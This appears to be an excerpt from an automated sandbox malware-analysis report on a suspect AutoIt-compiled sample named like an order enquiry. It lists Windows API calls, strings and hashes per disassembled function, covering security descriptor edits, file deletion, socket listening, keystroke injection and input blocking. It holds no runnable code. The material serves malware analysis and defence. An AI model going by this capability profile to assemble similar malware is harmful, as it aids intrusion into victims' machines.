                            • Instruction Fuzzy Hash: 8B72BD71D00219DBDF29DF98C8807ADB7B1FF48314F2581A9D899AB381E775AE80DB50
                            APIs
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                              • Part of subcall function 000BB8E7: GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                              • Part of subcall function 000BB8E7: GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                              • Part of subcall function 000BB8E7: HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                              • Part of subcall function 000BB982: GetProcessHeap.KERNEL32(00000008,000BB3E1,00000000,00000000,?,000BB3E1,?), ref: 000BB98E
                              • Part of subcall function 000BB982: HeapAlloc.KERNEL32(00000000,?,000BB3E1,?), ref: 000BB995
                              • Part of subcall function 000BB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BB3E1,?), ref: 000BB9A6
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BB3FC
                            • _memset.LIBCMT ref: 000BB411
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BB430
                            • GetLengthSid.ADVAPI32(?), ref: 000BB441
                            • GetAce.ADVAPI32(?,00000000,?), ref: 000BB47E
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BB49A
                            • GetLengthSid.ADVAPI32(?), ref: 000BB4B7
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BB4C6
                            • HeapAlloc.KERNEL32(00000000), ref: 000BB4CD
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BB4EE
                            • CopySid.ADVAPI32(00000000), ref: 000BB4F5
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BB526
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BB54C
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BB560
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 3996160137-0
                            • Opcode ID: fbc40e09831a41e723fa1c7590b5088fa32831fd2f0f01a1c2a551ad018e0a7f
                            • Instruction ID: 59b0327c8dc1944ae6f1a305e33cfa0c1e22510ea83e51f1cfe6ea4c422a3e11
                            • Opcode Fuzzy Hash: fbc40e09831a41e723fa1c7590b5088fa32831fd2f0f01a1c2a551ad018e0a7f
                            • Instruction Fuzzy Hash: 28511871900209AFDF10DFA5DC45AEEBBB9FF04300F148129F956AB2A1DBB5DA45CB60
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 000C7C0C: GetFileAttributesW.KERNEL32(?,000C6A7B), ref: 000C7C0D
                            • _wcscat.LIBCMT ref: 000C6E7E
                            • __wsplitpath.LIBCMT ref: 000C6E99
                            • FindFirstFileW.KERNEL32(?,?), ref: 000C6EAE
                            • _wcscpy.LIBCMT ref: 000C6EDD
                            • _wcscat.LIBCMT ref: 000C6EEF
                            • _wcscat.LIBCMT ref: 000C6F01
                            • DeleteFileW.KERNEL32(?), ref: 000C6F0E
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C6F22
                            • FindClose.KERNEL32(00000000), ref: 000C6F3D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                            • String ID: \*.*
                            • API String ID: 2643075503-1173974218
                            • Opcode ID: 0a04c583408e9bd99f25bb608ad59d232426683e5a8d3af4b2b52620eae10b15
                            • Instruction ID: c81d9255005b45820b563a838d92ddd365e32bdbd5a36d72b63d1a98e056763c
                            • Opcode Fuzzy Hash: 0a04c583408e9bd99f25bb608ad59d232426683e5a8d3af4b2b52620eae10b15
                            • Instruction Fuzzy Hash: 0421C1B2408344AAC620EBE4D884EDFBBDCAF59214F044A6EF5D4C3152EB31D64DC7A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                            • API String ID: 0-2893523900
                            APIs
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E317F
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000E321E
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000E32B6
                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000E34F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E3502
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            APIs
                              • Part of subcall function 000BA857: CLSIDFromProgID.OLE32 ref: 000BA874
                              • Part of subcall function 000BA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 000BA88F
                              • Part of subcall function 000BA857: lstrcmpiW.KERNEL32(?,00000000), ref: 000BA89D
                              • Part of subcall function 000BA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000BA8AD
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000DC6AD
                            • _memset.LIBCMT ref: 000DC6BA
                            • _memset.LIBCMT ref: 000DC7D8
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000DC804
                            • CoTaskMemFree.OLE32(?), ref: 000DC80F
                            Strings
                            • NULL Pointer assignment, xrefs: 000DC85D
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 000D24F6
                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000D2526
                            • _wcscmp.LIBCMT ref: 000D253A
                            • _wcscmp.LIBCMT ref: 000D2555
                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000D25F3
                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000D2609
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            Similarity
                            • API ID:
                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                            • API String ID: 0-1546025612
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            APIs
                              • Part of subcall function 000BBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BBF0F
                              • Part of subcall function 000BBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BBF3C
                              • Part of subcall function 000BBEC3: GetLastError.KERNEL32 ref: 000BBF49
                            • ExitWindowsEx.USER32(?,00000000), ref: 000C830C
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000D9235
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9244
                            • bind.WSOCK32(00000000,?,00000010), ref: 000D9260
                            • listen.WSOCK32(00000000,00000005), ref: 000D926F
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9289
                            • closesocket.WSOCK32(00000000,00000000), ref: 000D929D
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6F7D
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6F8D
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 000C6FAC
                            • __wsplitpath.LIBCMT ref: 000C6FD0
                            • _wcscat.LIBCMT ref: 000C6FE3
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C7022
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                            • String ID:
                            • API String ID: 1605983538-0
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _memmove.LIBCMT ref: 000F3020
                            • _memmove.LIBCMT ref: 000F3135
                            • _memmove.LIBCMT ref: 000F31DC
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            • API String ID: 1300846289-0
                            APIs
                              • Part of subcall function 000DACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 000D973D
                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 000D9760
                            Similarity
                            • API ID: ErrorLastinet_addrsocket
                            • String ID:
                            • API String ID: 4170576061-0
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 000CF37A
                            • _wcscmp.LIBCMT ref: 000CF3AA
                            • _wcscmp.LIBCMT ref: 000CF3BF
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000CF3D0
                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 000CF3FE
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNext
                            • String ID:
                            • API String ID: 2387731787-0
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000E20EC,?,000E22E0), ref: 000E2104
                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 000E2116
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetProcessId$kernel32.dll
                            • API String ID: 2574300362-399901964
                            APIs
                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000C439C
                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 000C43B8
                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000C4425
                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000C4483
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000C221E
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0009AE5E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: LongProcWindow
                            • String ID:
                            APIs
                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000D4A1E,00000000), ref: 000D55FD
                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000D5629
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: Internet$AvailableDataFileQueryRead
                            • String ID:
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CEA95
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000CEAEF
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000CEB3C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            APIs
                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C704C
                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000C708D
                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C7098
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle
                            • String ID:
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,000DC2E2,?,?,00000000,?), ref: 000CD73F
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,000DC2E2,?,?,00000000,?), ref: 000CD751
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            APIs
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000C4B89
                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 000C4B9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: InputSendkeybd_event
                            • String ID:
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BB9EC), ref: 000BB8C5
                            • CloseHandle.KERNEL32(?,?,000BB9EC), ref: 000BB8D7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0008125D,000A7A43,00080F35,?,?,00000001), ref: 000A8E41
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000A8E4A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: %
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            APIs
                            • BlockInput.USER32(00000001), ref: 000D7057
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000A8E1F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            APIs
                            • GetProcessHeap.KERNEL32(000A6AE9,001367D8,00000014), ref: 000AA937
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                            • Instruction ID: dfa06fcf84fcafd9cc2026027f1de1b21bb1101dfc2bf2e0755e1473229e25c1
                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                            • Instruction Fuzzy Hash: 25C1B2722091934ADFAD46BAC47447EBAE15BB37B131A476DD8B3CB4C4EE24C528D620
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction ID: 601d1a9818c95e811262ca3e8186767aa341e83ff8bcf2872513de6c96bc747e
                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                            • Instruction Fuzzy Hash: BDC1C1722052974ADFAD86BAC47443EFAE15BB37B531A476DD4B3CB4C0EE24C528D620
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: 5db70b7d107408793cdfe594186d331c331d52941c92c7eb556b9d7e70f1e021
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 73C1CF722091974AEFAD46BA847443EBBE15FB37B131A476DD4B3CB4C1EE24D528C620
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction ID: c22ed3f6b7be15ab05023d67e278a27b41ddefff64cdbbcc2f35e191e5dad172
                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction Fuzzy Hash: 6941B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                            • Instruction ID: a84f1311bcc02f36e82055506c0dcb132950f62bf622502f7170932cb57f8bd2
                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                            • Instruction Fuzzy Hash: 4A019278A10109EFCB44DF98C5919AEFBB5FF98310F208599EC09A7301D730AE41DB80
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                            • Instruction ID: 825778efa66e1e2b0c94b5c247b31d38d91972c3678d4e673f018f557fc24f9a
                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                            • Instruction Fuzzy Hash: 95019279A00109EFCB44DF98D5909AEF7B5FF59310F208599EC09A7705D730AE55DB80
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 000DA7A5
                            • DeleteObject.GDI32(00000000), ref: 000DA7B7
                            • DestroyWindow.USER32 ref: 000DA7C5
                            • GetDesktopWindow.USER32 ref: 000DA7DF
                            • GetWindowRect.USER32(00000000), ref: 000DA7E6
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000DA927
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000DA937
                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA97F
                            • GetClientRect.USER32(00000000,?), ref: 000DA98B
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000DA9C5
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA9E7
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA9FA
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA05
                            • GlobalLock.KERNEL32(00000000), ref: 000DAA0E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA1D
                            • GlobalUnlock.KERNEL32(00000000), ref: 000DAA26
                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA2D
                            • GlobalFree.KERNEL32(00000000), ref: 000DAA38
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAA4A
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0010D9BC,00000000), ref: 000DAA60
                            • GlobalFree.KERNEL32(00000000), ref: 000DAA70
                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000DAA96
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000DAAB5
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DAAD7
                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DACC4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2211948467-2373415609
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 000ED0EB
                            • GetSysColorBrush.USER32(0000000F), ref: 000ED11C
                            • GetSysColor.USER32(0000000F), ref: 000ED128
                            • SetBkColor.GDI32(?,000000FF), ref: 000ED142
